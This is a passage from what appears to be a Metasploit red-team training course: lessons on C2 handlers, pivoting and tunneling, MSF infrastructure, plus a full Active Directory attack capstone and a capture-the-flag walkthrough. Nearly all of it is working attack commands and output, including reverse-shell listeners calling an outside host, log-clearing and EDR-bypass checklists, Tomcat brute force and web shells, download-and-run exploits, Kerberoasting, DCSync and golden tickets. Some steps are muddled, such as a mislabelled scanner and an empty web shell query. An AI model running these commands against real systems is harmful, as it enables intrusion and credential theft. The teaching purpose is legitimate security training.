Quick assessment scanning\n# 3. Credential harvesting\n# 4. Lateral movement when C2 is detected/banned\n\n# Cobalt Strike + MSF workflow:\n# 1. MSF: Initial scan and exploitation\n# 2. MSF: Get first beacon on target\n# 3. Cobalt Strike: Install C2, pivot through network\n# 4. MSF: For targets that block/beacon detected\n\n# Using Metasploit as a C2:\nmsf6 > use exploit/multi/handler\nset PAYLOAD windows/x64/meterpreter/reverse_https\nset LHOST dailybuild.pw\nset LPORT 443\nset ExitOnSession false\nexploit -j\n\n# Domain fronting (use CDN as proxy):\n# Set ReverseListenerRedirect to true\n# Use CDN domain as LHOST (e.g., cloudfront)\n```\n\n---\n\n### Exercise 31.1\n\n**Task**: \n\n1. Create a Red Team Rules of Engagement document (in Thai and English) for a simulated engagement\n2. Define the objectives hierarchy (primary, secondary, tertiary)\n3. Create an OPSEC checklist with at least 10 items\n4. Set up a multi/handler with `reverse_https` payload (more stealthy than `reverse_tcp`)\n5. Explain how domain fronting would work in this scenario\n\n```bash\n# TODO: Create the document\n```\n\n\n\nSolution\n\n```bash\n# 1. Rules of Engagement (ROE)\ncat > /tmp/ROE.md << 'EOF'\n# RED TEAM ENGAGEMENT RULES OF ENGAGEMENT\n# Organization: Example Corp\n# Duration: 30 days\n# Classification: Confidential\n\n## OBJECTIVES\n\n### Primary\n1. Obtain Domain Admin access\n2. Access and demonstrate exfiltration of financial data\n3. Gain access to R&D systems\n\n### Secondary\n1. Establish persistent access on 5+ systems\n2. Demonstrate ability to move laterally to internal VLANs\n3. Compromise backup systems\n\n### Tertiary\n1. Access CEO workstation\n2. Demonstrate ability to access physical security systems\n\n## RULES\n\n1. NO Denial of Service attacks on production systems\n2. NO destructive data wip (wipe simulations only with approval)\n3. NO social engineering that could cause real-world harm\n4. NO targeting of personal devices outside scope\n5. All exploitation documented with timestamps\n6. Immediate escalation if exfiltration detected by blue team\n7. Weekly status reports every Monday\n8. All C2 traffic must be indistinguishable from normal HTTPS\n9. Persistence mechanisms must survive system reboots\n10. Blue team must NOT be tipped off before engagement ends\n\n## COMMUNICATION\n\n- Emergency contact: +66-xxx-xxxx\n- Signal channel: [REDACTED]\n- Engagement code word: PHOENIX\n-Abort code word: BANGKOK\nEOF\n\n# 2. Objectives hierarchy (already in ROE above)\n\n# 3. OPSEC Checklist\ncat > /tmp/OPSEC_CHECKLIST.md << 'EOF'\n# OPSEC Checklist (10+ items)\n\n## Network OPSEC\n[x] Rotate LHOST every 48 hours\n[x] Use domain fronting for C2 callbacks\n[x] Randomize callback intervals (jitter: 10-30%)\n[x] Use legitimate CDN as proxy (CloudFront, Azure CDN)\n[x] Avoid hardcoded IPs in payloads\n[x] Certificate pinning for C2 comms\n[ ] Domain reputation management (freshly registered domains)\n\n## Host OPSEC\n[x] Avoid writing files to disk when possible\n[x] Use LOLBins (Living-off-the-Land binaries) for execution\n[x] Clear event logs after exploitation\n[x] Disable PowerShell script block logging\n[x] Use process injection to blend with legitimate processes\n[x] Avoid spawning obvious malicious processes (cmd.exe + nc.exe)\n\n## Payload OPSEC\n[x] AV evasion (encoding, packing, custom stagers)\n[x] AMSI bypass before running .NET scripts\n[x] EDR userland hooking bypass (syscall direct)\n[x] Avoid API calls that trigger ETW (Event Tracing for Windows)\n[x] Sleep/jitter before executing suspicious code\n\n## Credential OPSEC\n[x] Use Kerberos tickets instead of NTLM hashes where possible\n[x] Avoid saving credentials to disk\n[x] Use DCSync carefully ( loud operation)\n[x] Golden ticket lifetime limited to 8 hours max\nEOF\n\n# 4. Multi-handler with reverse_https (stealth)\nmsfconsole -q\nmsf6 > use exploit/multi/handler\nmsf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_https\nmsf6 exploit(multi/handler) > set LHOST cobalt.example.com\nmsf6 exploit(multi/handler) > set LPORT 443\nmsf6 exploit(multi/handler) > set ExitOnSession false\nmsf6 exploit(multi/handler) > set HandlerSSLCert /tmp/cert.pem\nmsf6 exploit(multi/handler) > exploit -j\n\n# 5. Domain Fronting Explanation:\n# Domain fronting works by:\n# 1. Attacker registers a legitimate CDN domain (e.g., cloudfront.com)\n# 2. Attacker sets up C2 infrastructure behind the CDN\n# 3. Victim's HTTPS request goes to CDN with SNI:attacker-domain\n# 4. CDN routes to attacker backend based on Host header\n# 5. Firewall sees: legitimate cloudfront.com -> allowed\n# 6. Actual traffic: attacker-payload, invisible to firewall\n#\n# Implementation:\n# Use CloudFront as front, redirect Host: dailybuild.pw\n# Meterpreter connects to cloudfront.com:443\n# But Host header says dailybuild.pw\n# CloudFront routes to dailybuild.pw backend\n# Traffic appears as normal HTTPS to cloudfront\n```\n\n\n\n---\n\n## Lesson 32: Pivoting, Tunneling & Covert Channels\n\n### Learning Objectives\n- Create covert tunnels through Meterpreter sessions\n- Use portfwd and SOCKS proxy for pivoting\n- Understand DNS tunneling and ICMP tunneling\n- Use ProxyChains to tunnel any tool through MSF sessions\n- Set up VPN pivoting through compromised hosts\n\n---\n\n### Theory/Explanation\n\n#### Port Forwarding (Meterpreter)\n\n```bash\n# Forward local port to remote host\nmeterpreter > portfwd add -l 8080 -p 80 -r 10.10.10.50\n# Now: curl http://127.0.0.1:8080 \u2192 10.10.10.50:80 via meterpreter\n\n# Forward remote port to local\nmeterpreter > portfwd add -l 3306 -p 3306 -r 127.0.0.1\n# Now: mysql -h 127.0.0.1 \u2192 remote MySQL via meterpreter\n\n# List all forwards\nmeterpreter > portfwd\n\n# Delete forward\nmeterpreter > portfwd delete -l 8080 -p 80 -r 10.10.10.50\n\n# Flush all\nmeterpreter > portfwd flush\n```\n\n#### SOCKS Proxy for Tool Chaining\n\n```bash\n# Create SOCKS proxy server in MSF\nmsf6 > use auxiliary/server/socks_proxy\nmsf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1\nmsf6 auxiliary(server/socks_proxy) > set SRVPORT 1080\nmsf6 auxiliary(server/socks_proxy) > run -j\n\n# Configure /etc/proxychains.conf\ncat >> /etc/proxychains.conf << 'EOF'\n# Add at end:\nsocks4 127.0.0.1 1080\nEOF\n\n# Now tunnel ANY tool through MSF session:\nproxychains nmap -sT -sV 10.10.10.0/24\nproxychains ssh user@10.10.10.50\nproxychains hydra -L users.txt -P pass.txt 10.10.10.50 ssh\nproxychains firefox http://10.10.10.50 # Browse internal web\n```\n\n#### SSH Tunneling via Meterpreter\n\n```bash\n# If target has SSH access, pivot through it\nmeterpreter > shell\n$ ssh -D 1080 user@internal-ssh-server\n# Creates SOCKS proxy through SSH tunnel\n\n# Or reverse tunnel: from target to attacker\n# From meterpreter shell on target:\n$ ssh -R 8080:127.0.0.1:80 user@10.0.0.5\n# Now: attacker:8080 \u2192 target's localhost:80\n```\n\n#### VPN Pivoting (Meterpreter)\n\nMeterpreter supports VPN pivoting for full network access:\n\n```bash\n# Create VPN interface through meterpreter\nmeterpreter > run post/network/manage/vpn\n\n# Or use autoroute for full routing:\nmeterpreter > run post/multi/manage/autoroute\n# This adds routes to MSF for the entire internal network\n```\n\n#### DNS Tunneling\n\n```bash\n# DNS tunneling: encapsulate data in DNS queries\n# This works when only DNS is allowed out\n\n# Using dnscat2 (external tool):\n# On attacker:\ndnscat2-server example.com\n\n# On target (behind firewall):\ndnscat2-client --dns-server=10.0.0.5 --domain=example.com\n\n# Now you have a C2 channel over DNS\n# Commands are encoded in DNS TXT records\n```\n\n#### ICMP Tunneling\n\n```bash\n# Tunnel traffic through ICMP (ping) packets\n# Useful when only ping is allowed out\n\n# Using ptunnel-ng:\n# On attacker:\nptunnel-ng -p \n\n# On target:\nptunnel-ng -p -l -r -R \n\n# Now: target:local_port \u2192 attacker \u2192 remote_ip:remote_port\n```\n\n---\n\n### Exercise 32.1\n\n**Task**:\n\n1. Set up portfwd from your Kali machine to reach an internal web server at 10.10.10.50:80 via your meterpreter session\n2. Create a SOCKS proxy server on port 1080\n3. Configure proxychains to use the SOCKS proxy\n4. Use `proxychains nmap` to scan the internal network\n5. Demonstrate tunneling SSH through the Meterpreter session\n\n```bash\nmeterpreter > # TODO\n```\n\n\n\nSolution\n\n```bash\n# 1. Port forwarding (from meterpreter)\nmeterpreter > portfwd add -l 8080 -p 80 -r 10.10.10.50\n[*] Local TCP relay: 0.0.0.0:8080 <-> 10.10.10.50:80\n\n# Now on Kali, test the forward:\ncurl http://127.0.0.1:8080\n# Should show internal web server content\n\n# 2. SOCKS proxy (from msfconsole, not meterpreter)\n# background meterpreter first\nmeterpreter > background\nmsf6 > use auxiliary/server/socks_proxy\nmsf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1\nmsf6 auxiliary(server/socks_proxy) > set SRVPORT 1080\nmsf6 auxiliary(server/socks_proxy) > run -j\n[*] Auxiliary module running as background job 1.\n[*] Starting SOCKS proxy on 127.0.0.1:1080.\n\n# 3. Configure proxychains\ncat > /tmp/proxychains.conf << 'EOF'\ndynamic_chain\nproxy_dns\ntcp_read_time_out 15000\ntcp_connect_time_out 8000\n[ProxyList]\nsocks4 127.0.0.1 1080\nEOF\n\ncp /tmp/proxychains.conf /etc/proxychains.conf\n\n# 4. Scan internal network via proxychains\n# Add route to MSF first:\nmsf6 > route add 10.10.10.0 255.255.255.0 1\n# Now MSF routes through session 1\n\n# But proxychains goes through the SOCKS proxy:\nproxychains nmap -sT -sV -p 22,80,443 10.10.10.50\n# Output shows open ports on internal host through tunnel\n\n# 5. SSH tunnel through meterpreter\nmeterpreter > shell\n$ ssh -D 1080 -C -N user@internal-ssh-server\n# -D 1080: creates SOCKS proxy on port 1080\n# -C: compress\n# -N: don't execute remote command (just tunnel)\n\n# Now you can use the SSH tunnel as another SOCKS proxy\n# Or in proxychains.conf add:\n# socks4 127.0.0.1 1080\n```\n\n\n\n---\n\n## Lesson 33: Building Your MSF Infrastructure\n\n### Learning Objectives\n- Set up a secure Metasploit database with PostgreSQL\n- Configure MSF for high-performance scanning\n- Set up a team server for collaborative assessments\n- Configure logging and audit trails\n- Build scripts for rapid deployment\n\n---\n\n### Theory/Explanation\n\n#### Database Setup\n\n```bash\n# PostgreSQL setup for MSF\nsudo apt update && sudo apt install postgresql\n\n# Create MSF database user\nsudo -u postgres createuser msf -P\n# Enter password: your_secure_password\n\n# Create database\nsudo -u postgres createdb -O msf msfdb\n\n# Initialize\nmsfdb init\n\n# Configure MSF to use external database\n# Edit: ~/.msf4/database.yml\ncat > ~/.msf4/database.yml << 'EOF'\nproduction:\n adapter: postgresql\n database: msfdb\n username: msf\n password: your_secure_password\n host: 127.0.0.1\n port: 5432\n pool: 5\n timeout: 5\nEOF\n\n# Connect\nmsfconsole -q\nmsf6 > db_status\n[*] postgresql connected to msfdb\n```\n\n#### High-Performance Configuration\n\n```bash\n# ~/.msf4/msf4.yml\n# Tune performance for large assessments\ncat > ~/.msf4/msf4.yml << 'EOF'\n# Performance\nperformance:\n thread_limit: 20\n nmap_max_parallel_sockets: 10\n mass_assessment_max: 500\n\n# Database\ndb:\n mass_assessment_import: true\n auto_collapse_note_types:\n - vulnerability\n - vuln\n - cve\n\n# Logging\nlogging:\n level: verbose\n api_log: /var/log/msf/api.log\nEOF\n```\n\n#### Team Server Setup\n\n```bash\n# For collaborative assessments, use MSF RPC daemon\n# Start msfrpcd\nmsfdb stop\nmsfrpcd -U team -P team_password -S -f\n\n# Now team members can connect:\nmsfconsole --rpc\n# Or connect via msfrpc client in Python:\n# from metasploit.msf import MsfRpcClient\n# client = MsfRpcClient('team_password', port=55553)\n```\n\n#### Logging and Audit\n\n```bash\n# Enable detailed logging\n# In msfconsole:\nmsf6 > set Global verbose\n\n# Set log directory\nmsf6 > set LogLevel 3\n\n# Save all output to file\nmsf6 > makerc /tmp/assessment.rc\n\n# Export complete database\nmsf6 > db_export -f xml /tmp/assessment_data.xml\nmsf6 > db_export -f pwdump /tmp/assessment_hashes.txt\n\n# Store loot in organized directory\nmkdir -p /tmp/loot/{hosts,services,credentials,screenshots}\n```\n\n---\n\n### Exercise 33.1\n\n**Task**:\n\n1. Configure PostgreSQL database for MSF\n2. Create a workspace for your assessment\n3. Import an Nmap scan XML result\n4. Set up a high-performance configuration\n5. Create a resource script that initializes everything in one command\n6. Configure log rotation for MSF logs\n\n```bash\n# TODO: Execute all steps\n```\n\n\n\nSolution\n\n```bash\n# 1. Configure PostgreSQL\nsudo systemctl start postgresql\nsudo systemctl enable postgresql\nsudo -u postgres createuser msf -P\nsudo -u postgres createdb -O msf msfdb\n\n# 2. Create database.yml\nmkdir -p ~/.msf4\ncat > ~/.msf4/database.yml << 'EOF'\nproduction:\n adapter: postgresql\n database: msfdb\n username: msf\n password: msf_secure_password_2024\n host: 127.0.0.1\n port: 5432\n pool: 5\n timeout: 5\nEOF\n\n# 3. Create workspace\nmsfconsole -q\nmsf6 > workspace -a RedTeamAssessment\nmsf6 > workspace RedTeamAssessment\n\n# 4. Import Nmap scan\nmsf6 > db_import /tmp/nmap_scan.xml\nmsf6 > hosts\nmsf6 > services\n\n# 5. High-performance config\ncat > ~/.msf4/msf4.yml << 'EOF'\nperformance:\n thread_limit: 20\n mass_assessment_max: 1000\ndb:\n mass_assessment_import: true\nlogging:\n level: verbose\nEOF\n\n# 6. Setup resource script\ncat > /tmp/msf_setup.rc << 'EOF'\n# Initialize MSF for assessment\nworkspace -a RedTeamAssessment\nsetg THREADS 20\nsetg VERBOSE true\n\n# High performance DB\ndb_import /tmp/nmap_scan.xml\n\n# Configure SOCKS for pivoting\nuse auxiliary/server/socks_proxy\nset SRVHOST 127.0.0.1\nset SRVPORT 1080\nrun -j\n\n# Set up handler\nuse exploit/multi/handler\nset PAYLOAD windows/x64/meterpreter/reverse_https\nset LHOST dailybuild.pw\nset LPORT 443\nset ExitOnSession false\nexploit -j\n\n# Show initial status\nhosts\nservices\njobs\nEOF\n\n# Run: msfconsole -q -r /tmp/msf_setup.rc\n\n# 7. Log rotation\n# Add to /etc/logrotate.d/metasploit\nsudo cat > /etc/logrotate.d/metasploit << 'EOF'\n/var/log/msf/*.log {\n daily\n rotate 7\n compress\n delaycompress\n notifempty\n create 0640 root root\n}\nEOF\n```\n\n\n\n---\n\n# Module 8: Capstone Projects\n\n---\n\n## Capstone 1: Full Penetration Test with Complete Attack Chain\n\n### Scenario Overview\n\n**Objective:** Perform a complete penetration test against a target organization called `SecureCorp Ltd.` Your objective is to achieve Domain Admin within the internal network.\n\n**Scope:**\n- External: 203.0.113.0/24 (single public IP: 203.0.113.50)\n- Internal: 192.168.1.0/24 (Windows AD environment)\n- DMZ: 192.168.1.50 (public-facing web server)\n- Internal: 192.168.1.0/24 (full AD domain: securecorp.local)\n- Domain Controllers: 192.168.1.10 (DC01), 192.168.1.11 (DC02)\n\n**Rules:**\n- No DoS attacks\n- Document all findings\n- Immediate stop if ransomware or destructive actions are triggered\n- All exploitation via MSF unless specified otherwise\n\n### Phase 1: External Reconnaissance\n\n**Step 1.1: Initial Port Scan**\n\n```bash\n# Start MSF with database\nmsfconsole -q\nmsf6 > db_nmap -sT -sV -sC -O -p 1-10000 -oA /tmp/external_scan 203.0.113.50\n\n# Results show:\n# PORT STATE SERVICE VERSION\n# 22 open ssh OpenSSH 8.4 (Ubuntu)\n# 80 open http Apache 2.4.41\n# 443 open https Apache 2.4.41\n# 3306 open mysql MySQL 8.0.23\n# 8080 open http Apache Tomcat 9.0.43\n```\n\n**Step 1.2: Web Enumeration**\n\n```bash\n# Directory scan\nmsf6 > use auxiliary/scanner/http/dir_scanner\nmsf6 auxiliary(scanner/http/dir_scanner) > set RHOSTS 203.0.113.50\nmsf6 auxiliary(scanner/http/dir_scanner) > run\n\n# Results:\n# /admin (Tomcat manager)\n# /phpmyadmin\n# /backup\n# /api\n\n# Nikto web scan\nmsf6 > use auxiliary/scanner/http/cert\nmsf6 auxiliary(scanner/http/cert) > set RHOSTS 203.0.113.50\nmsf6 auxiliary(scanner/http/cert) > run\n```\n\n**Step 1.3: Tomcat Exploitation**\n\n```bash\n# Tomcat manager brute force\nmsf6 > use auxiliary/scanner/http/tomcat_mgr_login\nmsf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS 203.0.113.50\nmsf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8080\nmsf6 auxiliary(scanner/http/tomcat_mgr_login) > run\n\n# Result:\n# 203.0.113.50:8080 - TOMCAT_MANAGER - tomcat:s3cretP@ss123! - SUCCESS\n```\n\n**Step 1.4: Deploy Webshell via Tomcat**\n\n```bash\n# Upload WAR with meterpreter\nmsf6 > use exploit/multi/http/tomcat_mgr_upload\nmsf6 exploit(multi/http/tomcat_mgr_upload) > set RHOSTS 203.0.113.50\nmsf6 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080\nmsf6 exploit(multi/http/tomcat_mgr_upload) > set USERNAME tomcat\nmsf6 exploit(multi/http/tomcat_mgr_upload) > set PASSWORD s3cretP@ss123!\nmsf6 exploit(multi/http/tomcat_mgr_upload) > set PAYLOAD java/meterpreter/reverse_tcp\nmsf6 exploit(multi/http/tomcat_mgr_upload) > set LHOST 10.0.0.5\nmsf6 exploit(multi/http/tomcat_mgr_upload) > set LPORT 4444\nmsf6 exploit(multi/http/tomcat_mgr_upload) > exploit\n\n# Result: Java Meterpreter session on DMZ host (192.168.1.50)\n```\n\n### Phase 2: Internal Reconnaissance\n\n**Step 2.1: Network Enumeration**\n\n```bash\n# From meterpreter session:\nmeterpreter > ipconfig\n# Shows:\n# Interface 11: 192.168.1.50 (DMZ host)\n# Interface 12: 10.10.10.0/24 (Internal network via VLAN)\n\n# Add route to internal network\nmeterpreter > run autoroute -s 10.10.10.0/24\nmsf6 > route add 10.10.10.0 255.255.255.0 1\n\n# Scan internal network through pivot\nmsf6 > use auxiliary/scanner/portscan/tcp\nmsf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.10.10.0/24\nmsf6 auxiliary(scanner/portscan/tcp) > set PORTS 1-1000\nmsf6 auxiliary(scanner/portscan/tcp) > set THREADS 20\nmsf6 auxiliary(scanner/portscan/tcp) > run\n\n# Results:\n# 10.10.10.10 - 22, 80, 443, 445, 3389 (Server)\n# 10.10.10.20 - 22, 80, 443, 3268, 636 (Domain Controller)\n```\n\n**Step 2.2: AD Enumeration**\n\n```bash\n# From meterpreter shell on DMZ:\nmeterpreter > shell\nC:\\> cd C:\\\\Windows\\\\Temp\nC:\\Windows\\Temp> curl http://10.0.0.5/PowerView.ps1 -o PowerView.ps1\nC:\\Windows\\Temp> powershell -ExecutionPolicy Bypass -File PowerView.ps1\nPS C:\\> Import-Module .\\PowerView.ps1\nPS C:\\> Get-NetDomain\n\n# Forest: securecorp.local\n# DomainControllers: DC01, DC02\n\nPS C:\\> Get-NetUser -SPN | Select-Object samaccountname,serviceprincipalname\n\n# Output:\n# samaccountname serviceprincipalname\n# svc_sql MSSQLSvc/sql01.securecorp.local\n# svc_backup MSSQLSvc/backup.securecorp.local\n# svc_web http/web.securecorp.local\n```\n\n### Phase 3: Kerberoasting\n\n**Step 3.1: Request TGS Tickets**\n\n```bash\n# From meterpreter with PowerShell:\nPS C:\\> IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1')\nPS C:\\> Invoke-Mimikatz -Command '\"kerberos::list /export\"'\n\n# This exports all TGS tickets\n# Alternative: use MSF module\nmsf6 > use auxiliary/admin/kerberos/ticket_export\nset SESSION 1\nset USER svc_sql\nrun\n\n# Crack with hashcat\nhashcat -m 13100 -a 0 tickets.kirbi /usr/share/wordlists/rockyou.txt\n# Result: svc_sql:MyStr0ngP@ssw0rd!\n```\n\n### Phase 4: Lateral Movement\n\n**Step 4.1: Pass-the-Hash to SQL Server**\n\n```bash\n# With cracked svc_sql hash:\nmsf6 > use exploit/windows/smb/psexec\nmsf6 exploit(windows/smb/psexec) > set RHOSTS 10.10.10.30\nmsf6 exploit(windows/smb/psexec) > set SMBUser svc_sql\nmsf6 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99\nmsf6 exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp\nmsf6 exploit(windows/smb/psexec) > set LHOST 10.0.0.5\nmsf6 exploit(windows/smb/psexec) > exploit\n\n# New session on SQL Server (10.10.10.30)\n```\n\n**Step 4.2: Privilege Escalation to SYSTEM**\n\n```bash\n# On SQL Server session:\nmeterpreter > getsystem -t 3\n[*] Escalating to SYSTEM via reflective DLL...\n[*] Already at SYSTEM privilege level\n\nmeterpreter > getuid\nServer username: NT AUTHORITY\\SYSTEM\n```\n\n### Phase 5: Domain Dominance\n\n**Step 5.1: DCSync Attack**\n\n```bash\n# Load kiwi and extract krbtgt hash\nmeterpreter > load kiwi\nmeterpreter > dcsync_ntlm SECURECORP\\\\krbtgt\n\n# Output:\n# Hash: 31d6cfe0d16ae931b73c59d7e0c089c0\n# SID: S-1-5-21-1234567890-1234567890-1234567890\n\n# Also get administrator hash\nmeterpreter > dcsync_ntlm SECURECORP\\\\Administrator\n```\n\n**Step 5.2: Golden Ticket Attack**\n\n```bash\n# Create golden ticket\nmeterpreter > golden_ticket_create -d SECURECORP.LOCAL \\\n -k 31d6cfe0d16ae931b73c59d7e0c089c0 \\\n -s S-1-5-21-1234567890-1234567890-1234567890 \\\n -u Administrator \\\n -t /tmp/golden_ticket.kirbi\n\n# Use the ticket\nmeterpreter > kerberos_ticket_use /tmp/golden_ticket.kirbi\n\n# Verify with:\nmeterpreter > getuid\nServer username: SECURECORP\\Administrator\n\n# Now access Domain Controller\nmsf6 > use exploit/windows/smb/psexec\nmsf6 exploit(windows/smb/psexec) > set RHOSTS 10.10.10.20\nmsf6 exploit(windows/smb/psexec) > set SMBUser Administrator\nmsf6 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0\nmsf6 exploit(windows/smb/psexec) > set PAYLOAD windows/x64/meterpreter/reverse_tcp\nmsf6 exploit(windows/smb/psexec) > set LHOST 10.0.0.5\nmsf6 exploit(windows/smb/psexec) > exploit\n\n# Result: Meterpreter on Domain Controller as SYSTEM\n```\n\n### Phase 6: Documentation & Reporting\n\n**Step 6.1: Export All Data**\n\n```bash\n# Export database\nmsf6 > db_export -f xml /tmp/pentest_report.xml\n\n# Export credentials\nmsf6 > creds all\n\n# Export hosts and services\nmsf6 > hosts -o /tmp/hosts.csv\nmsf6 > services -o /tmp/services.csv\n\n# Export loot\nmsf6 > loot\n```\n\n**Step 6.2: Findings Summary**\n\n```\nFINDINGS SUMMARY\n================\n\nCritical Findings:\n1. CVE-2024-XXXX: Apache Tomcat Manager RCE (CVSS 9.8)\n - Default credentials tomcat:s3cretP@ss123!\n - Allows WAR file deployment\n - Remote code execution as root/SYSTEM\n\n2. Kerberoasting: SPN accounts with weak passwords\n - svc_sql password cracked: MyStr0ngP@ssw0rd!\n - Allowed lateral movement to SQL Server\n\n3. DCSync: Domain admin via krbtgt hash extraction\n - SYSTEM access on any domain server allows DCSync\n - Golden ticket created for persistence\n\nImpact:\n- Full Domain Admin achieved\n- All domain credentials can be extracted\n- Persistent access established via golden ticket\n- Data exfiltration possible from any domain resource\n\nRecommendations:\n1. Remove default Tomcat credentials\n2. Implement strong passwords for SPN accounts\n3. Monitor for DCSync attacks (Event ID 4662)\n4. Implement privileged access workstations\n5. Deploy HoneyTokens for Kerberoast detection\n```\n\n---\n\n## Capstone 2: CTF Challenge \u2014 \"HackTheBox-Style Full Box\"\n\n### Challenge Setup\n\n**Target:** 192.168.56.101 (single VM, VulnHub style)\n\n**Objective:** Capture two flags: `user.txt` and `root.txt`\n\n**Phases:**\n1. Port scanning and enumeration\n2. Web exploitation\n3. Initial shell access\n4. Privilege escalation to user\n5. Root access and flag capture\n\n### Walkthrough\n\n**Step 1: Initial Scan**\n\n```bash\nmsfconsole -q\nmsf6 > db_nmap -sV -sC -A -p- -oA /tmp/htb_scan 192.168.56.101\n\n# Results:\n# PORT STATE SERVICE VERSION\n# 22 open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1\n# 80 open http Apache 2.4.41 (Ubuntu)\n# 3306 open mysql MySQL 8.0.23\n```\n\n**Step 2: Web Enumeration**\n\n```bash\nmsf6 > use auxiliary/scanner/http/dir_scanner\nmsf6 auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.56.101\nmsf6 auxiliary(scanner/http/dir_scanner) > run\n\n# Found: /admin (phpMyAdmin), /dashboard, /uploads\n```\n\n**Step 3: SQL Injection**\n\n```bash\n# Test for SQL injection on login form\nmsf6 > use auxiliary/scanner/http/sql_injection\n# Manual testing reveals: POST to /login with username parameter is vulnerable\n\n# Use sqlmap to confirm and extract data\n# From attacker machine (not MSF):\nsqlmap -u http://192.168.56.101/login --data=\"username=admin&password=test\" --dbs\n# Database: webapp\n# Extract credentials\nsqlmap -u http://192.168.56.101/login --data=\"username=admin&password=test\" -D webapp -T users --dump\n```\n\n**Step 4: phpMyAdmin Exploitation**\n\n```bash\n# From sqlmap results: root:RootP@ssw0rd!@mysql\n# Use phpMyAdmin to write web shell\nmsf6 > use auxiliary/admin/http/phpmyadmin_superuser\nset RHOSTS 192.168.56.101\nset USERNAME root\nset PASSWORD RootP@ssw0rd!@mysql\nrun\n\n# Write shell via INTO OUTFILE\nmsf6 > use auxiliary/admin/mysql/mysql_sql\nset SQL \"SELECT '' INTO OUTFILE '/var/www/html/shell.php'\"\nrun\n```\n\n**Step 5: Initial Shell**\n\n```bash\n# Access web shell\ncurl http://192.168.56.101/shell.php?cmd=whoami\n# www-data\n\n# Generate and upload meterpreter\nmsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f elf -o /tmp/shell.elf\n# Upload via web shell\ncurl -F \"file=@/tmp/shell.elf\" http://192.168.56.101/upload\n# Execute via web shell\ncurl http://192.168.56.101/shell.php?cmd=chmod%20+x%20/tmp/shell.elf%3b/tmp/shell.elf\n```\n\n**Step 6: User Flag**\n\n```bash\n# Meterpreter session established\nmeterpreter > shell\n$ python3 -c 'import pty; pty.spawn(\"/bin/bash\")'\n$ cd /home\n$ ls\nubuntu\n$ cat /home/ubuntu/user.txt\nHTB{usr_fl4g_h3r3_m8r7}\n```\n\n**Step 7: Privilege Escalation**\n\n```bash\n# From meterpreter:\n$ find / -perm -4000 -type f 2>/dev/null\n/usr/bin/bash\n/usr/bin/sudo\n\n$ sudo -l\nUser ubuntu may run the following commands on this host:\n (ALL) NOPASSWD: /usr/bin/python3\n\n$ sudo python3 -c 'import os; os.system(\"/bin/bash\")'\n# root shell\n\n$ cat /root/root.txt\nHTB{r00t_fl4g_h3r3_m8r7}\n```\n\n**Step 8: Alternative: Kernel Exploit**\n\n```bash\n# If sudo wasn't available:\n# Check kernel version\n$ uname -a\nLinux 5.4.0-77-generic #86-Ubuntu x86_64\n\n# Search for exploit\nsearchsploit linux kernel 5.4 priv esc\n# EDB: 45010.c - Ubuntu 18.04 privilege escalation\n\n# Download, compile, execute\n$ curl http://10.0.0.5/45010.c -o /tmp/exploit.c\n$ gcc /tmp/exploit.c -o /tmp/exploit\n$ chmod +x /tmp/exploit\n$ /tmp/exploit\n# root\n```\n\n---\n\n## Quick Reference: All Essential MSF Commands\n\n### Module Navigation\n```bash\nmsf6 > search type:exploit name:eternalblue platform:windows\nmsf6 > use exploit/windows/smb/ms17_010_eternalblue\nmsf6 exploit(...) > show options\nmsf6 exploit(...) > show payloads\nmsf6 exploit(...) > set RHOSTS 192.168.1.50\nmsf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp\nmsf6 exploit(...) > set LHOST 10.0.0.5\nmsf6 exploit(...) > exploit\n```\n\n### Meterpreter Core\n```bash\nmeterpreter > sysinfo\nmeterpreter > getuid\nmeterpreter > getpid\nmeterpreter > ps\nmeterpreter > migrate \nmeterpreter > shell\nmeterpreter > background\nmeterpreter > exit\n```\n\n### File Operations\n```bash\nmeterpreter > ls\nmeterpreter > pwd\nmeterpreter > cd /path\nmeterpreter > upload /local /remote\nmeterpreter > download /remote /local\nmeterpreter > search -d / -f *.txt\n```\n\n### Network Operations\n```bash\nmeterpreter > ipconfig\nmeterpreter > netstat\nmeterpreter > portfwd add -l 8080 -p 80 -r 10.10.10.50\nmeterpreter > run autoroute -s 10.10.10.0/24\n```\n\n### Credential Operations\n```bash\nmeterpreter > hashdump\nmeterpreter > load kiwi\nmeterpreter > creds\nmeterpreter > run post/windows/gather/credentials/credential_collector\n```\n\n### Post-Exploitation\n```bash\nmeterpreter > run post/windows/manage/migrate\nmeterpreter > run post/windows/gather/hashdump\nmeterpreter > run post/windows/gather/enum_logged_on_users\nmeterpreter > keyscan_start\nmeterpreter > keyscan_dump\n```\n\n### Database Operations\n```bash\nmsf6 > db_status\nmsf6 > hosts\nmsf6 > services\nmsf6 > creds\nmsf6 > loot\nmsf6 > notes\nmsf6 > db_import /tmp/scan.xml\nmsf6 > db_export -f xml /tmp/results.xml\n```\n\n### Resource Scripts\n```bash\nmsfconsole -q -r /tmp/script.rc\nmsf6 > makerc /tmp/ops.rc\nmsf6 > resource /tmp/script.rc\n```\n\n---\n\n", "creation_timestamp": "2026-06-13T10:28:11.000000Z"}